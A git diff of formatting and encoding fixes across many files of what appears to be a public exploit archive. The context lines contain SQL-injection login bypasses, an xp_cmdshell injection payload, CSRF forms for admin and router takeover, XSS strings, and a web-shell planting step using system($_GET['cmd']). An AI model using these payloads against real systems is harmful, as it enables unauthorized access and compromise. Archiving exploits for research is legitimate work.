diff --git a/exploits/aix/dos/35342.txt b/exploits/aix/dos/35342.txt
index 8e6af2054..b51b5bbcc 100644
--- a/exploits/aix/dos/35342.txt
+++ b/exploits/aix/dos/35342.txt
@@ -43,7 +43,7 @@ function updateDataBase($robot, $nom, $actif, $user_agent, $ip1, $ip2, $detectio
   global $RS_LANG, $RS_LANGUE, $RS_TABLE_ROBOTS, $RS_DETECTION_USER_AGENT, $RS_DETECTION_IP;
 
   // dans tous les cas :
-  echo "<p class='normal'><a class='erreur'> ";
+  echo "<p class='normal'><a class='erreur'> ";
   $msg = "";
 
   // test du nom
diff --git a/exploits/aix/webapps/11580.txt b/exploits/aix/webapps/11580.txt
index dadcbd759..406990f64 100644
--- a/exploits/aix/webapps/11580.txt
+++ b/exploits/aix/webapps/11580.txt
@@ -54,8 +54,8 @@ Add/Edit Admin CSRF:
 <td><input type='checkbox' name='uload' value='1'>Upload</td>			<td><input type='checkbox' name='rename' value='1'>Rename</td>
 <td><input type='checkbox' name='delete' value='1'>Delete</td>		<td><input type='checkbox' name='edit' value='1'>Edit</td>
 <td><input type='checkbox' name='dload' value='1'>Download</td>		<td><input type='checkbox' name='chmod' value='1'>Chmod</td>
-<td><input type='checkbox' name='move' value='1'>Move</td>			<td> </td></tr>
-<td colspan='2'><input type='submit' value='Add User' name='sub'> <input type='button' value='Cancel' onclick='top.location="index.php"'></td>
+<td><input type='checkbox' name='move' value='1'>Move</td>			<td> </td></tr>
+<td colspan='2'><input type='submit' value='Add User' name='sub'> <input type='button' value='Cancel' onclick='top.location="index.php"'></td>
 </form>
 </body>
 </html>
diff --git a/exploits/aix/webapps/14058.html b/exploits/aix/webapps/14058.html
index 7359241c6..c76c2db93 100644
--- a/exploits/aix/webapps/14058.html
+++ b/exploits/aix/webapps/14058.html
@@ -69,12 +69,12 @@ http://Target.com/includes/FCKeditor/editor/filemanager/browser/default/connecto
 
 </td>
 <td>
-   </td>
+   </td>
 <td>
 Current Folder<br />
 <input id="txtFolder" type="text" value="/" name="txtFolder" /></td>
 <td>
-   </td>
+   </td>
 
 <td>
 Resource Type<br />
@@ -96,16 +96,16 @@ Resource Type<br />
 <td valign="top">
 <a href="#" onclick="GetFolders();">Get Folders</a></td>
 <td>
-   </td>
+   </td>
 <td valign="top">
 <a href="#" onclick="GetFoldersAndFiles();">Get Folders and Files</a></td>
 <td>
-   </td>
+   </td>
 
 <td valign="top">
 <a href="#" onclick="CreateFolder();">Create Folder</a></td>
 <td>
-   </td>
+   </td>
 <td valign="top">
 <form id="frmUpload" action="" target="eRunningFrame" method="post"
 enctype="multipart/form-data">
diff --git a/exploits/asp/webapps/11295.txt b/exploits/asp/webapps/11295.txt
index f9a09fe33..366f21426 100644
--- a/exploits/asp/webapps/11295.txt
+++ b/exploits/asp/webapps/11295.txt
@@ -11,7 +11,7 @@ Arbitrary File Upload
 <form action = "http://site.com/manage/ewebeditor/upload.asp?action=save&type=IMAGE&style=luoye 'union select S_ID, S_Name, S_Dir, S_CSS, [S_UploadDir]% 2b' / .. / db ', S_Width, S_Height, S_Memo, S_IsSys, S_FileExt, S_FlashExt, [S_ImageExt]% 2b' | asa ', S_MediaExt, S_FileSize, S_FlashSize, S_ImageSize, S_MediaSize, S_StateFlag, S_DetectFromWord, S_InitMode, S_BaseUrl from ewebeditor_style where s_name =' standard 'and'a' = 'a "method = post name = myform enctype =" multipart / form-data "> 
 <p align="center"> 
 <input type=file name=uploadfile size=100><br> <br> 
-<input type=submit value=Upload>  </p>
+<input type=submit value=Upload>  </p>
 </form> 
 
 
diff --git a/exploits/asp/webapps/12471.txt b/exploits/asp/webapps/12471.txt
index 114a978c9..860494f7c 100644
--- a/exploits/asp/webapps/12471.txt
+++ b/exploits/asp/webapps/12471.txt
@@ -75,8 +75,8 @@ DEMO : TO change the admin login details and other info..
         <input type=text name=Adminlevel value="Root">
       </td>
     </tr>
-      <td width="168"> </td>
-      <td width="220"> </td>
+      <td width="168"> </td>
+      <td width="220"> </td>
     </tr>
     <tr> 
       <td colspan="2">        
diff --git a/exploits/asp/webapps/13891.html b/exploits/asp/webapps/13891.html
index a1dd8738c..c9102bcc4 100644
--- a/exploits/asp/webapps/13891.html
+++ b/exploits/asp/webapps/13891.html
@@ -22,8 +22,8 @@ Sex
 </select>
 </p>
 <p>Avatar :<input type="text" name="icon" size="49" value="icon"></p>
-<p> </p>
-<p> </p>
+<p> </p>
+<p> </p>
 
 </form>
 </frewal>
diff --git a/exploits/asp/webapps/17015.txt b/exploits/asp/webapps/17015.txt
index fee4b2542..d3e4030c4 100644
--- a/exploits/asp/webapps/17015.txt
+++ b/exploits/asp/webapps/17015.txt
@@ -7,7 +7,7 @@
 # Software Link: http://www.element-it.com/downloadfile.aspx?type=pow
 # Demo:
 http://site.com/Examples/PowUpload/Simpleupload.htm
- 
+ 
 [Comment]
 Agradezco a mis amigos: Hernan Jais, Alfonso Cuevas, Inyexion,
 Login-Root, KikoArg, Ricota,
diff --git a/exploits/asp/webapps/17016.txt b/exploits/asp/webapps/17016.txt
index 4ab9d3d85..80f6110f4 100644
--- a/exploits/asp/webapps/17016.txt
+++ b/exploits/asp/webapps/17016.txt
@@ -6,7 +6,7 @@
 # Software: EAFlashUpload v 2.5
 # Software Link: http://www.easyalgo.com/downloads.aspx#EAFlashUpload
 # Demo: http://www.site.com/examples/eaflashupload/simpleupload.aspx
- 
+ 
 [Comment]
 Agradezco a mis amigos: Hernan Jais, Alfonso Cuevas, Inyexion,
 Login-Root, KikoArg, Ricota,
diff --git a/exploits/asp/webapps/3493.txt b/exploits/asp/webapps/3493.txt
index ec25e6274..fb361a8a1 100644
--- a/exploits/asp/webapps/3493.txt
+++ b/exploits/asp/webapps/3493.txt
@@ -194,16 +194,16 @@ MSSQL CMD Injection Exploit(For DBO Users) :
   <tr>
     <center><img src="http://img382.imageshack.us/img382/7867/dirav8.jpg"></center><br>
     <center><td align="right"><font face="Arial" size="1" color="#00FF00">Command Exec :</td>
-    <td> </td>
+    <td> </td>
     <td><input name="action=viewimage&categoryid=-1" type="text" value=";exec master..xp_cmdshell 'dir c:\ > cmd.txt';CREATE TABLE cmd (txt varchar(8000));BULK INSERT cmd FROM 'cmd.txt';exec+sp_makewebtask+'ftp://127.0.0.1/public/file.txt','select+*+from+cmd';--" class="inputbox" style="color: #000000" style="width:300px; "></td>
   </tr>
   <tr>
     <td align="right"><font face="Arial" size="1" color="#00FF00">Search Board</td>
-    <td> </td>
+    <td> </td>
     <td>
       <select name="">
         <option value="0">(CMD)</option>
-      </select> <br><br>
+      </select> <br><br>
       <input type="submit" value="Apply"></center>
     </td>
   </tr>
diff --git a/exploits/asp/webapps/7277.txt b/exploits/asp/webapps/7277.txt
index 3ac299f7b..f12e83bbc 100644
--- a/exploits/asp/webapps/7277.txt
+++ b/exploits/asp/webapps/7277.txt
@@ -1,4 +1,4 @@
-[~] ----------------------------بسم الله الرحمن الرحيم------------------------------
+[~] ----------------------------بسم الله الرحمن الرحيم------------------------------
 Â [~]Tybe:(Auth Bypass) Remote SQL Injection Vulnerability
 Â  Â 
 Â [~]Vendor: www.activewebsoftwares.com
@@ -30,7 +30,7 @@
 Â 
 Â  [~] Greetz tO: {str0ke} & maxmos & EV!L KS@ & hesham_hacker
 Â  [~]
-  [~] spechial thanks : dolly & 7am3m & عماد ,الزهيري
+  [~] spechial thanks : dolly & 7am3m & عماد ,الزهيري
 Â  [~]
 Â  [~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller
 Â  [~]
diff --git a/exploits/asp/webapps/7423.txt b/exploits/asp/webapps/7423.txt
index 702f7678c..47e709ab1 100644
--- a/exploits/asp/webapps/7423.txt
+++ b/exploits/asp/webapps/7423.txt
@@ -4,25 +4,25 @@
    
  [~] Vendor: www.adserversolutions.com
    
- [☠] Software: Affiliate Software Java 4.0
+ [☠] Software: Affiliate Software Java 4.0
    
- [☠] author: ((я3d D3v!L))
+ [☠] author: ((я3d D3v!L))
    
- [☠] Date: 12.12.2008
+ [☠] Date: 12.12.2008
 
- [☠] Home: www.ahacker.biz
+ [☠] Home: www.ahacker.biz
    
- [☠] contact: N/A
+ [☠] contact: N/A
 
-[☠]  ☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠{DEV!L'5 of SYST3M}☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠
+[☠]  ☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠{DEV!L'5 of SYST3M}☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠
    
- [☠] Exploit:
+ [☠] Exploit:
    
- ☠ username: r0' or ' 1=1--
- ☠ password: r0' or ' 1=1--
+ ☠ username: r0' or ' 1=1--
+ ☠ password: r0' or ' 1=1--
    
    
- [☠]login 4 d3m0:
+ [☠]login 4 d3m0:
    
   http://www.adserversolutions.com/affiliate_java/logon.jsp
  
diff --git a/exploits/asp/webapps/7424.txt b/exploits/asp/webapps/7424.txt
index eda069309..514e31f3c 100644
--- a/exploits/asp/webapps/7424.txt
+++ b/exploits/asp/webapps/7424.txt
@@ -14,7 +14,7 @@
    
  [~] contact: N/A
 
-[~]☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠{R0}☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠
+[~]☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠{R0}☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠
    
  [~] Exploit:
    
@@ -22,7 +22,7 @@
  [~] password: r0' or ' 1=1--
    
    
- [☠] login 4 d3m0:
+ [☠] login 4 d3m0:
    
   www.adserversolutions.com/admgmt_460/logon.jsp
  
diff --git a/exploits/asp/webapps/7425.txt b/exploits/asp/webapps/7425.txt
index 83144dc72..3fbb985d8 100644
--- a/exploits/asp/webapps/7425.txt
+++ b/exploits/asp/webapps/7425.txt
@@ -14,7 +14,7 @@
    
  [~] contact: N/A
 
-[~]☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠{R0}☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠
+[~]☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠{R0}☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠
    
  [~] Exploit:
    
@@ -22,7 +22,7 @@
  [~] password: r0' or ' 1=1--
    
    
- [☠]login 4 d3m0:
+ [☠]login 4 d3m0:
    
   www.adservingsolutions.com/xchange_java/logon_license.jsp
  
diff --git a/exploits/asp/webapps/9675.txt b/exploits/asp/webapps/9675.txt
index fe3352018..947d4114b 100644
--- a/exploits/asp/webapps/9675.txt
+++ b/exploits/asp/webapps/9675.txt
@@ -1,42 +1,42 @@
  [☢] ☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢{بسم الله الرحمن الرحيم}☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢
-[☠]
+[☠]
 [~] Tybe:(details.asp PropId) BL!ND SQL Injection Vulnerability
-[☠]
+[☠]
 [~] Vendor: www.hotwebscripts.co.uk
-[☠]
-[☠] Software: HotWeb Rentals 
-[☠]
-[☠] author: ((я3d D3v!L))
-[☠]
-[☠] Date: 15.2.2009
-[☠]
-[☠] Home: CL053D
-[☠]
-[☠] contact: X@hotmail.co.jp
-[☠]☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠{DEV!L'5 of SYST3M}☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠
+[☠]
+[☠] Software: HotWeb Rentals 
+[☠]
+[☠] author: ((я3d D3v!L))
+[☠]
+[☠] Date: 15.2.2009
+[☠]
+[☠] Home: CL053D
+[☠]
+[☠] contact: X@hotmail.co.jp
+[☠]☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠{DEV!L'5 of SYST3M}☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠
 
-[☠] ERR0R CONSOLE
+[☠] ERR0R CONSOLE
 
 WwW.XxX.CcC/details.asp?PropId=(BL!ND EV!L !NJ3c7!0N)
 
-[☠]SECURE ALERT FR0M 7h3 R3d-D3V!L
+[☠]SECURE ALERT FR0M 7h3 R3d-D3V!L
 
-[☠] Exploit:
+[☠] Exploit:
 
-[☠] TRU3 : details.asp?PropId=1+and+1=1
+[☠] TRU3 : details.asp?PropId=1+and+1=1
 
 
- [☠] FALS3 : details.asp?PropId=1+and+1=2
+ [☠] FALS3 : details.asp?PropId=1+and+1=2
 
-[☠]liv3 3xpL0!T:
-[☠] TRU3 : holidayrentals.hotwebscripts.co.uk/details.asp?PropId=1+and+1=1
-[☠] F4L53 :holidayrentals.hotwebscripts.co.uk/details.asp?PropId=1+and+1=2
+[☠]liv3 3xpL0!T:
+[☠] TRU3 : holidayrentals.hotwebscripts.co.uk/details.asp?PropId=1+and+1=1
+[☠] F4L53 :holidayrentals.hotwebscripts.co.uk/details.asp?PropId=1+and+1=2
 
 
- [☠]
+ [☠]
 
 N073:
-R34L R3d-D3V!L WAS h3R3 ((☠X@Minhal.co.il☠))
+R34L R3d-D3V!L WAS h3R3 ((☠X@Minhal.co.il☠))
 
 4R48!4N-HACK3R!!القراصنه العرب
 
@@ -46,9 +46,9 @@ R34L R3d-D3V!L WAS h3R3 ((☠X@Minhal.co.il☠))
  [~]70 ِALL ARAB!AN HACKER 3X3PT:LAM3RZ
 [~] spechial thanks : ((dolly)) & ((7am3m)) &MAGOUSH ;) & EMAD & 0R45h3Y  
 
- [☠]spechial SupP0RT: MY M!ND -57R0K3-''M!Lw0RM 3MP3R0R''-''3XPLO!T-houSE''
+ [☠]spechial SupP0RT: MY M!ND -57R0K3-''M!Lw0RM 3MP3R0R''-''3XPLO!T-houSE''
 
-[☠] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --D3V!L R007
+[☠] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --D3V!L R007
 
   [~]spechial FR!ND: 74M3M تميم
 
diff --git a/exploits/hardware/dos/11769.py b/exploits/hardware/dos/11769.py
index 223eef81f..01b5548c7 100755
--- a/exploits/hardware/dos/11769.py
+++ b/exploits/hardware/dos/11769.py
@@ -36,7 +36,7 @@ def main():
 	</head>
 	<body onLoad="triggerCrash()">
 	<div id="evilDiv">
-	 
+	 
 	</div>
 	</body>
 	</html>
diff --git a/exploits/hardware/local/24899.txt b/exploits/hardware/local/24899.txt
index 1b23630ef..41627da10 100644
--- a/exploits/hardware/local/24899.txt
+++ b/exploits/hardware/local/24899.txt
@@ -14,7 +14,7 @@ The Vigor 3900 is a high-performance quad-Gigabit WAN router for high-performanc
 failover. Its WAN throughput runs at up to 1Gb/s, adequate for the most demanding SME applications. The WAN ports on the Vigor 3900 can provide load balancing
 or WAN failover. Based on a new DrayTek OS platform, the Vigor 3900 combines high performance and capacity with DrayTek's traditional ease of use and comprehensive
 features set.
-########For multi-tenant or departmental flexibility, the Vigor3900 will support multiple LAN IP subnets, together with VLAN capabilities and user management
+########For multi-tenant or departmental flexibility, the Vigor3900 will support multiple LAN IP subnets, together with VLAN capabilities and user management
 providing access to WAN resources only to the appropriate users or departments, as well as maintaining infrastructure effciency.
 
 ############################Advisory:###################################################
diff --git a/exploits/hardware/webapps/26401.txt b/exploits/hardware/webapps/26401.txt
index d3c824105..bad7bea3e 100644
--- a/exploits/hardware/webapps/26401.txt
+++ b/exploits/hardware/webapps/26401.txt
@@ -26,8 +26,8 @@ Exploit:
 <tbody><tr><td class="headerbg">Factory Reset</td></tr>
 </tbody></table>
 <table bgcolor="#FFFFFF" border="0" cellpadding="5" cellspacing="1" width="100%">
-<tbody><tr><td height="50" bgcolor="#F0F0F0"> <span class="bluetextbold">Do you want to restore Print Server to factory default setting?</span></td></tr>
-</tbody></table><br> 
+<tbody><tr><td height="50" bgcolor="#F0F0F0"> <span class="bluetextbold">Do you want to restore Print Server to factory default setting?</span></td></tr>
+</tbody></table><br> 
 <input name="Factory" value=" Yes " type="submit" width="60">
 </form>
 
@@ -41,7 +41,7 @@ Exploit:
 </tbody></table>
 <table bgcolor="#FFFFFF" border="0" cellpadding="5" cellspacing="1" width="100%">
 <tbody><tr>
- <td class="bluetextbold" align="right" bgcolor="#C5CEDA" valign="top" width="150"> IP Address:</td>
+ <td class="bluetextbold" align="right" bgcolor="#C5CEDA" valign="top" width="150"> IP Address:</td>
  <td bgcolor="#F0F0F0" valign="top">
  <table border="0">
  <tbody><tr><td>
@@ -49,15 +49,15 @@ Exploit:
   <table border="0" cellpadding="3" cellspacing="0">
   <tbody><tr>
    <td width="20"></td><td>IP Address</td>
-   <td>:  <input size="18" name="IP_Address" value="192.168.1.110" type="text"></td>
+   <td>:  <input size="18" name="IP_Address" value="192.168.1.110" type="text"></td>
   </tr>
   <tr>
    <td></td><td>Subnet Mask</td>
-   <td>:  <input size="18" name="Subnet_Mask" value="255.255.255.0" type="text"></td>
+   <td>:  <input size="18" name="Subnet_Mask" value="255.255.255.0" type="text"></td>
   </tr>
   <tr>
    <td></td><td>Default Gateway</td>
-   <td>:  <input size="18" name="Default_Gateway" value="192.168.1.254" type="text"></td>
+   <td>:  <input size="18" name="Default_Gateway" value="192.168.1.254" type="text"></td>
   </tr>
   </tbody></table>
 </td></tr>
@@ -68,8 +68,8 @@ Exploit:
 </tbody></table>
 <table border="0" cellpadding="5" cellspacing="1" width="100%">
 <tbody><tr>
- <td height="50" width="149"> </td>
- <td width="355"> <input name="Config2" value=" Save " type="submit" width="80">  <input value="Cancel" type="reset" width="80"></td>
+ <td height="50" width="149"> </td>
+ <td width="355"> <input name="Config2" value=" Save " type="submit" width="80">  <input value="Cancel" type="reset" width="80"></td>
 </tr>
 </tbody></table>
 </form>
\ No newline at end of file
diff --git a/exploits/hardware/webapps/32943.txt b/exploits/hardware/webapps/32943.txt
index d5a365e5b..d700d0885 100644
--- a/exploits/hardware/webapps/32943.txt
+++ b/exploits/hardware/webapps/32943.txt
@@ -2,11 +2,11 @@
 # Date: 20-04-2014
 # Author: Rakesh S
 # Software Link: http://www.teracom.in/
-# Version:  T2-B-Gawv1.4U10Y-BI
+# Version:  T2-B-Gawv1.4U10Y-BI
 
 The vulnerability exists due to insufficient validation of HTTP request origin. A remote attacker can trick a logged-in administrator to visit a specially crafted webpage to change SSID and its password.
- 
+ 
 The exploitation example below changes password for the SSID:
- 
- 
+ 
+ 
 <a href="http://[HOST]/webconfig/wlan/country.html/country?context=&wlanprofile=MIXED_G_WIFI&wlanstatus=on&country=INI&txpower=1&wlanmultitouni=on&TxRate=Automatic&chanselect=automatic&channel=8&essid=SSID&hidessid=off&security=wpa2&encryptionselect=tkip&authmethodselect=psk&wpapp=ChangePassword&pmkcaching=on&confirm=Confirm" target="myIframe">Submit</a>
\ No newline at end of file
diff --git a/exploits/hardware/webapps/44935.txt b/exploits/hardware/webapps/44935.txt
index e5de7efb8..9fc8b669f 100644
--- a/exploits/hardware/webapps/44935.txt
+++ b/exploits/hardware/webapps/44935.txt
@@ -1,6 +1,6 @@
 # Exploit Title: DIGISOL DG-BR4000NG - Cross-Site Scripting
 # Date: 2018-06-24
-# Vendor Homepage:  http://www.digisol.com
+# Vendor Homepage:  http://www.digisol.com
 # Hardware Link: https://www.amazon.in/Digisol-DG-BR4000NG-Wireless-Broadband-802-11n/dp/B00A19EHYK
 # Category: Hardware
 # Exploit Author: Adipta Basu
@@ -8,9 +8,9 @@
 # Web: https://hackings8n.blogspot.com
 # Tested on: Mac OS High Sierra
 # CVE: CVE-2018-12705
- 
+ 
 # Reproduction Steps:
- 
+ 
 - Goto your Wifi Router Gateway [i.e: http://192.168.2.1]
 - Go to --> "General Setup" --> "Wireless" --> "Basic Settings"
 - Open BurpSuite
diff --git a/exploits/hardware/webapps/44955.txt b/exploits/hardware/webapps/44955.txt
index 382183ac9..a993a3b0d 100644
--- a/exploits/hardware/webapps/44955.txt
+++ b/exploits/hardware/webapps/44955.txt
@@ -1,17 +1,17 @@
 # Exploit Title: DIGISOL DG-HR3400 Wireless Router -  Cross-Site Scripting
 # Date: 2018-06-25
-# Vendor Homepage:  http://www.digisol.com
+# Vendor Homepage:  http://www.digisol.com
 # Hardware Link: https://www.amazon.in/Digisol-DG-HR3400-300Mbps-Wireless-Broadband/dp/B00IL8DR6W
 # Category: Hardware
 # Exploit Author: Adipta Basu
 # Tested on: Mac OS High Sierra
 # CVE: N/A
- 
+ 
 # Reproduction Steps:
- 
-   - Goto your Wifi Router Gateway [i.e: http://192.168.2.1]
-   - Go to --> "General Setup" --> "Wireless" --> "Basic Settings"
-   - Open BurpSuite
+ 
+   - Goto your Wifi Router Gateway [i.e: http://192.168.2.1]
+   - Go to --> "General Setup" --> "Wireless" --> "Basic Settings"
+   - Open BurpSuite
    - Change the SSID to "Testing" and hit "Apply"
    - Burp will capture the intercepts.
    - Now change the SSID to <script>alert("ADIPTA")</script> and keep APSSID as it is
diff --git a/exploits/hardware/webapps/45037.txt b/exploits/hardware/webapps/45037.txt
index 19a1942d4..ccadac58e 100644
--- a/exploits/hardware/webapps/45037.txt
+++ b/exploits/hardware/webapps/45037.txt
@@ -104,7 +104,7 @@ testlab:$1$.ezacuj4$s.hoiWAaLH7G./vHcfXku.
 testlab1:$1$tV44sdhe$cgoB4Pk814NQl.1Uo90It0
 testlab1:$1$tV44sdhe$cgoB4Pk814NQl.1Uo90It0
 roOt:$1$MJOnV/Y3$tDnMIBMy0lEQ2kDpfgTJP0" />
-      <input type="hidden" name="save" value=" Save Changes " />
+      <input type="hidden" name="save" value=" Save Changes " />
       <input type="submit" value="Submit request" />
     </form>
   </body>
diff --git a/exploits/hardware/webapps/45038.txt b/exploits/hardware/webapps/45038.txt
index f0c747bfe..85dafa743 100644
--- a/exploits/hardware/webapps/45038.txt
+++ b/exploits/hardware/webapps/45038.txt
@@ -155,7 +155,7 @@ START=90
 ftpd &
 
 " />
-      <input type="hidden" name="save" value=" Save Changes " />
+      <input type="hidden" name="save" value=" Save Changes " />
       <input type="submit" value="Submit request" />
     </form>
   </body>
diff --git a/exploits/ios/dos/37660.txt b/exploits/ios/dos/37660.txt
index d9974989a..62480328b 100644
--- a/exploits/ios/dos/37660.txt
+++ b/exploits/ios/dos/37660.txt
@@ -21,7 +21,7 @@ use threads;
 use LWP::UserAgent;
 
 
-print "    Mohammad Reza Espargham\n   www.reza.es\n\n     Syntax: perl poc.pl 192.168.1.3\n\n";
+print "    Mohammad Reza Espargham\n   www.reza.es\n\n     Syntax: perl poc.pl 192.168.1.3\n\n";
 
 
 $port=8080; #port
diff --git a/exploits/ios/webapps/27188.txt b/exploits/ios/webapps/27188.txt
index 4863b0b70..3a2a71b7b 100644
--- a/exploits/ios/webapps/27188.txt
+++ b/exploits/ios/webapps/27188.txt
@@ -129,7 +129,7 @@ Add Directory</a>  |  <a id="AllSelect" href="javascript:selectAll()">Select All
   |  <a href="javascript:if(confirm('Are%20you%20sure%20to%20delete?'))delPhoto();" 
 id="del" style="color:#F30;">Delete</a></span>
 <span style="position:absolute; left:10px;">Photos/ ><[PERSISTENT INJECTED SCRIPT CODE VIA ADD DIRECTORY NAME]">/
-    <a href="javascript:window.location.href='..'" 
+    <a href="javascript:window.location.href='..'" 
 style="color:#F60"> <<Up 
 Level</a></span><span id="photoCount"></span>
 
diff --git a/exploits/java/webapps/43733.rb b/exploits/java/webapps/43733.rb
index 875803ee2..2d3840839 100755
--- a/exploits/java/webapps/43733.rb
+++ b/exploits/java/webapps/43733.rb
@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote
     'Name'           => 'CVE-2017-1000486 Primefaces Remote Code Execution Exploit',
     'Description'    => %q{
           This module exploits an expression language remote code execution flaw in the Primefaces JSF framework.
-          Primefaces versions prior to 5.2.21, 5.3.8 or 6.0 are vulnerable to a padding oracle attack, due to the use of weak crypto and default encryption password and salt.
+          Primefaces versions prior to 5.2.21, 5.3.8 or 6.0 are vulnerable to a padding oracle attack, due to the use of weak crypto and default encryption password and salt.
   },
     'Author'         => [ 'Bjoern Schuette' ],
     'License'        => MSF_LICENSE,
diff --git a/exploits/jsp/remote/18179.html b/exploits/jsp/remote/18179.html
index 2d0760aea..2191df72b 100644
--- a/exploits/jsp/remote/18179.html
+++ b/exploits/jsp/remote/18179.html
@@ -2,9 +2,9 @@
 # Date:30/11/2011
 # Author: Alexey Sintsov
 # Software Link: http://www.ibm.com/
-# Version:8.5.3/8.5.2 FP3 (0day) 
+# Version:8.5.3/8.5.2 FP3 (0day) 
 # Tested on: Windows 7 / Windows 2008
-# CVE : CVE-2011-1519
+# CVE : CVE-2011-1519
 
 
 Application: IBM Lotus Domino Controller
@@ -12,7 +12,7 @@ Versions Affected: <=8.5.2 FP3, <=8.5.3
 Manager 4.0 prior to Update 4
 (0day) 
 Vendor URL: http://ibm.com
-Bug: own XML parser  
+Bug: own XML parser  
 CVE: CVE-2011-1519
 CVSS2: 9.0
 Exploits: YES
@@ -23,7 +23,7 @@ Digital Security Research Group [DSecRG] (research [at] dsecrg [dot]com)
 
 This bug was found by Patrik Karlsson and sold to ZDI. IBM make fix for this bug,
 but not enough. So this sploit can make auth. bypass in Lotus Domino Controller even with patch from IBM. So still 0day.
-Details you can read there: http://dsecrg.com/pages/pub/show.php?id=41
+Details you can read there: http://dsecrg.com/pages/pub/show.php?id=41
 
 EXPLOIT:
 
@@ -65,9 +65,4 @@ height = "99%"
 <PARAM NAME="onLoad" VALUE="onLoadConsole">
 </applet>
 </body>
-</html>
-
-
-
-
- 
\ No newline at end of file
+</html>
\ No newline at end of file
diff --git a/exploits/jsp/webapps/21545.txt b/exploits/jsp/webapps/21545.txt
index a4aaf590f..3d221894f 100644
--- a/exploits/jsp/webapps/21545.txt
+++ b/exploits/jsp/webapps/21545.txt
@@ -4,7 +4,7 @@ CVE-2012-4051 - JAMF Casper Suite MDM CSRF Vulnerability
 # Date: Discovered and reported July 2012
 # Author: Jacob Holcomb/Gimppy042
 # Software JAMF Software Casper Suite (http://jamfsoftware.com/products/casper-suite)
-# CVE : CVE-2012-4051 for the CSRF 
+# CVE : CVE-2012-4051 for the CSRF 
 
 
 <head>
diff --git a/exploits/linux/local/19517.pl b/exploits/linux/local/19517.pl
index 287e2df75..8a717a3df 100755
--- a/exploits/linux/local/19517.pl
+++ b/exploits/linux/local/19517.pl
@@ -14,9 +14,9 @@ highlighted remember password.
 Greetz: Hernan Jais, Alfonso Cuevas, SPEED, hacklego, Incid3nt,
 Maximiliano Soler, Pablin77,_tty0, Login-Root,Knet,Kikito,Duraznit0,
 InyeXion, ksha, zerial,LinuxFer, Scorp
-    her0, r0dr1 y demas user de RemoteExecution
-    www.remoteexecution.info www.remoteexcution.com.ar
-    #RemoteExecution Hacking Group
+    her0, r0dr1 y demas user de RemoteExecution
+    www.remoteexecution.info www.remoteexcution.com.ar
+    #RemoteExecution Hacking Group
 
 [PoC]
 
diff --git a/exploits/linux/remote/18145.py b/exploits/linux/remote/18145.py
index 9a51f1ea8..4a401899d 100755
--- a/exploits/linux/remote/18145.py
+++ b/exploits/linux/remote/18145.py
@@ -132,8 +132,8 @@ addr_os = {
     # ID # OS                        # STACK SIZE      # GADGET TABLE
     1  : ["Arch Linux 2010.05    ",  0xb9,             arch_rop_chain], # wireshark-gtk-1.4.3-1-i686.pkg.tar.xz
     2  : ["Labs test             ",  0xbf,             labs_rop_chain],
-	-1 : ["Debian 5.0.8 Lenny    ",  -3,               False],			# wireshark_1.0.2-3+lenny12_i386.deb
-    -2 : ["Debian 6.0.2 Squeeze  ",  -1,               False],			# wireshark_1.2.11-6+squeeze1_i386.deb	
+	-1 : ["Debian 5.0.8 Lenny    ",  -3,               False],			# wireshark_1.0.2-3+lenny12_i386.deb
+    -2 : ["Debian 6.0.2 Squeeze  ",  -1,               False],			# wireshark_1.2.11-6+squeeze1_i386.deb	
     -3 : ["Fedora 14             ",  -1,               False],			# wireshark-1.4.3-1.2.2.i586.rpm
     -4 : ["OpenSuse 11.3         ",  -1,               False],			# wireshark-1.4.3-1.2.2.i586.rpm
     -5 : ["Ubuntu 10.10 | 11.04  ",  -1,               False],			# 
diff --git a/exploits/linux/remote/364.pl b/exploits/linux/remote/364.pl
index c37f1293c..b49f11f46 100755
--- a/exploits/linux/remote/364.pl
+++ b/exploits/linux/remote/364.pl
@@ -38,7 +38,7 @@ print "Sent\n";
 
 while (<$remote>)
 {
- print $_;
+ print $_;
 }
 print "\n";
 
diff --git a/exploits/linux/webapps/34241.txt b/exploits/linux/webapps/34241.txt
index 9af2d3952..fb042d09c 100644
--- a/exploits/linux/webapps/34241.txt
+++ b/exploits/linux/webapps/34241.txt
@@ -16,7 +16,7 @@ While logged in as admin user:
 
 3) log in as that user
 
-4) edit /usr/local/ispconfig/interface/lib/lang/en.lng with system($_GET['cmd']);
+4) edit /usr/local/ispconfig/interface/lib/lang/en.lng with system($_GET['cmd']);
 
 
 5) browse to: http://server:8080/index.php?cmd=echo /tmp/script >>/usr/local/ispconfig/server/server.sh
diff --git a/exploits/linux/webapps/49321.py b/exploits/linux/webapps/49321.py
index b62e60274..109253b02 100755
--- a/exploits/linux/webapps/49321.py
